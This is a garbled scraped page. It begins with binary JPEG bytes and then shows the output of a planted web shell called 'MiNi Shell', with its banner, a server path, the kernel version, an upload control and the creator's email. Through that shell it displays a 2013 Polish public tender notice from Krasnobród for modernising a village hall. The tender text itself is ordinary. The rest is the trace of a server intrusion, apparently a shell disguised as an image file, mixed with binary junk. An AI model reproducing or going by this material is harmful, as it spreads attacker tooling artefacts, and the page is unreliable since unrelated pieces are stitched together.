JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131224/280781-N-2013.html

<p class="kh_header"><b>Krasnobród: Zaprojektowanie i wykonanie robót budowlanych: Modernizacja budynku świetlicy wiejskiej w Dominikanówce.</b><br>
<b>Numer ogłoszenia: 280781 - 2013; data zamieszczenia: 24.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krasnobród , ul. 3 Maja 36, 22-440 Krasnobród, woj. lubelskie, tel. 0-84 660 7691, faks 0-84 660 7692.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krasnobrod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie robót budowlanych: Modernizacja budynku świetlicy wiejskiej w Dominikanówce..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zaprojektowanie i wykonanie robót budowlanych pod nazwą: Modernizacja budynku świetlicy wiejskiej w Dominikanówce. Wykonawca w ramach zamówienia zobowiązany będzie do wykonania:
I. PROJEKTU WYKONAWCZEGO dla inwestycji pn. Modernizacja budynku świetlicy wiejskiej w Dominikanówce na podstawie projektu budowlanego znajdującego się w posiadaniu Zamawiającego. Projekt budowlany znajdujący się w posiadaniu Zamawiającego jest aktualny i na podstawie powyższego projektu wydane zostało Zamawiającemu ważne pozwolenie na budowę. Projekt wykonawczy musi zostać opracowany dla wszystkich branż wyszczególnionych i opisanych projektem budowlanym. Projekt wykonawczy należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. (Dz. U. z 2013 poz. 1129 - tekst jednolity)   
II ROBÓT BUDOWLANYCH W ramach pierwszego etapu Modernizacji budynku świetlicy wiejskiej w Dominikanówce.
 Wykonawca będzie zobowiązany do zrealizowania następującego zakresu robót budowlanych:
A) Wymiana konstrukcji dachowej oraz pokrycia dachu.
B) Wymiana instalacji elektrycznej.
C) Wymiana stolarki okiennej i drzwiowej.  
W zakres zamówienia wchodzi między innymi niżej wymieniony
zakres robót:
1.Rozbiórka pokrycia dachowego,
2.Wykonanie łacenia, konstrukcji dachowej.
(Materiały z rozbiórki wykonawca złoży na miejscu placu budowy. Materiały pochodzące z rozbiórki Zamawiający zagospodaruje we własnym zakresie)
3.Wykonanie konstrukcji dachu wg opracowanego przez Wykonawcę projektu wykonawczego (murłaty oraz wiązary, pełne deskowanie pokrycia dachu papą, łacenie, pokrycie blacho dachówką, montaż gąsiorów, montaż blach okapowych)
4. Rozbiórka dotychczasowych i murowanie nowych kominów.
5. Wykonanie czapek kominowych.
6. Obróbka czapek kominowych.
7. Montaż kratek wentylacyjnych w kominach.
8. Montaż wyłazu dachowego.
9. Montaż składanych schodów strychowych na poddaszu przy wyłazie.
10. Montaż instalacji odgromowej.
11. Wykonanie kominów wentylacyjnych z płyty OSB w wyprowadzeniem ponad dach. 
12. Wyprowadzenie pionów kanalizacyjnych ponad dach oraz ich obróbka.
13. Wykonanie instalacji elektrycznej w zakresie związanym z wykonaniem
oświetlenia sali głównej. Na sali głównej należy zamontować oprawy świetlówkowe lub oświetlenie punktowe ledowe z żarówkami ledowymi - moc zamontowanych żarówek ma być nie mniejsza niż 2 waty). 
14. Wymiana instalacji elektrycznej w obiekcie wraz z montażem nowych rozdzielnic  wg projektu opracowanego projektu wykonawczego.
15. Montaż lamp oświetlenia ewakuacyjnego  oraz  napisem wyjście ewakuacyjne przy wyjściach ewakuacyjnych. Lampy muszą zostać wyposażone w moduł
awaryjny; 
16. Wykonanie sufitu podwieszanego montowanego do konstrukcji dachowej.
17. Montaż na dachu płotków śniegowych.
18. Wykonanie podsufitki na zewnątrz budynku.
19. Szpachlowanie oraz malowanie sufitu podwieszanego.
20. Ocieplenie sufitu podwieszanego.
21. Wymiana drzwi garażowych na ocieplane segmentowe - 1 kpl.
22. Wymiana pięciu okien na stolarkę PCV
23. Wymiana drzwi zewnętrznych na drzwi stalowe ocieplane - szt. 2 
24. Wymiana  drzwi wewnętrznych na wewnątrz klatkowe - 1 szt.
25. Wymiary zewnętrzne budynku świetlicy - 22,70m X11,20m.,

UWAGA: Szczegółowy opis przedmiotu zamówienia zawarty jest projekcie budowlanym oraz Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek posiadania wiedzy i doświadczenia jeśli udokumentuje się
zrealizowaniem w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępownaiu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: przynajmniej jednej roboty budowlanej związanej z wykonaniem lub remontem lub przebudową  obiektu budowlanego kubaturowego który wykonawca  zaprojektował i zrealizował w systemie zaprojektuj i wybuduj. Wartość wykazanej roboty budowlanej nie może być mniejsza niż 100.000zł brutto.
Ocena sposobu spełniania warunku przez wykonawcę przeprowadzona zostanie na podstawie
załączonych dokumentów metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 20.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>OGRANICZENIE LICZBY WYKONAWCÓW. KTÓRZY ZOSTANĄ ZAPROSZENI DO SKŁADANIA OFERT. 
Zamawiający po dokonaniu oceny wniosków o dopuszczenie do udziału w postępowaniu zaprosi do składania ofert tych wykonawców, którzy otrzymają najwyższe oceny spełnienia warunków w podanym niżej KRYTERIUM KWALIFIKACYJNYM:
 Wykonawca otrzyma punkty za doświadczenie zawodowe wykazane ponad wymagane minimum opisane w minimalnych wymaganiach o których mowa wyżej (opis spełniania warunku posiadania wiedzy i doświadczenia), polegające na wykonaniu z należytą starannością, w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robocie budowlanej stanowiącej przedmiot zamówienia. Zamawiający punktował będzie roboty budowlane o wartości co najmniej  1000.000,00zł brutto.  
          Wykonawca który spełni warunki określone w ogłoszeniu to jest, udokumentuje zrealizowanie co najmniej jednej roboty budowlanej ponad wymagane minimum obejmujące wykonanie lub remont lub przebudowę  obiektu budowlanego kubaturowego który wykonawca  zaprojektował i zrealizował w systemie zaprojektuj i wybuduj. Wartość wykazanej roboty budowlanej nie może być mniejsza niż 100.000zł brutto, oraz potwierdzona  dowodem określającym czy robota ta została wykonana w sposób należyty oraz wskazującym czy została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona  - otrzyma 1 punkt. 
 Za każdą następną robotę budowlaną porównywalną z przedmiotem zamówienia, i potwierdzoną dowodem określającym czy robota ta została wykonana w sposób należyty oraz wskazującym czy została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona  wykonawca otrzyma kolejny 1 punkt. 
 Do składania ofert zamawiający zaprosi:
- pierwszych 20 wykonawców, którzy spełniają wymagane warunki i osiągną najwyższą liczbę punktów przyznaną zgodnie z powyższym opisem lub
- wszystkich wykonawców, którzy spełnią minimalne warunki udziału w postępowaniu, jeżeli liczba wykonawców będzie mniejsza lub równa liczbie 20.
 W przypadku gdy dwóch lub więcej wykonawców uzyska taka samą liczbę punktów kwalifikujących wykonawcę na  20 miejsce, o przyznaniu miejsca na liście zaproszonych do składania ofert będzie decydować sumaryczna wartość zrealizowanych zamówień spełniających warunki opisane powyżej. Zamawiający w żadnym wypadku nie będzie brał pod uwagę (nie będzie przyznawał punktów) za zrealizowanie robót budowlanych w systemie ZAPROJEKTUJ I WYBUDUJ o wartości poniżej 100.000,00zł brutto.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b></p>
<p>przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: Aukcja będzie prowadzona na portalu aukcyjnym prowadzonym przez Urząd Zamówień Publicznych: https://aukcje.uzp.gov.pl</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian w umowie: 1) Zmiana w zakresie wysokości wynagrodzenia, związana ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); 
3) Zmiana terminów określonych w niniejszej umowie pod warunkiem, że zmiana będzie wynikała z przyczyn leżących po stronie Zamawiającego. 
4) Zmiana w zakresie materiałów użytych do realizacji przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zaprzestania produkcji danego asortymentu, zmiany przepisów prawa bądź ujawnienia na etapie realizacji robót odstępstw założeń przyjętych w dokumentacji projektowej w stosunku
do rzeczywiście odkrytych na placu budowy istniejących elementów budowli, budynków lub instalacji, 
5)Zmiana osób wykonujących zamówienie, pod warunkiem, że zmiana będzie wynikała z odrębnych przepisów w tym rozwiązania bądź wygaśnięcia umowy, utraty wymaganych uprawnień lub zdarzeń losowych uniemożliwiających świadczenie pracy, 6) Zmiana wprowadzająca rozwiązania zamienne (roboty zamienne) pod warunkiem, że będzie to skutkowało ulepszeniem realizacji zamówienia, usprawnieniem
procesu budowy bądź koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych, 
7) Zmiana terminu wynikająca z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy takich jak:
a. wystąpienia siły wyższej w rozumieniu przepisów Kodeksu cywilnego
b. wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie robót, Przez warunki niesprzyjające należy rozumieć ciągłe opady deszczu utrzymujące przez okres co najmniej trzech  tygodni w trakcie okresu przewidzianego
na realizację przedmiotu zamówienia. W przypadku zaistnienia takiej okoliczności obowiązek przedłożenia Zamawiającemu stosownych dokumentów potwierdzających zaistnienie niekorzystnych warunków atmosferycznych w trakcie trwania kontraktu spoczywa na Wykonawcy. 
c. wystąpienia robót dodatkowych (nieprzewidzianych) bezpośrednio wpływających na wydłużenie realizacji robót podstawowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krasnobrod.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Krasnobrodzie
ul. 3 Maja 36
22-440 Krasnobród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.01.2014 godzina 10:00, miejsce: Sekretariat Urzędu Miejskiego w Krasnobrodzie
ul. 3 Maja 36
22-440 Krasnobród.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com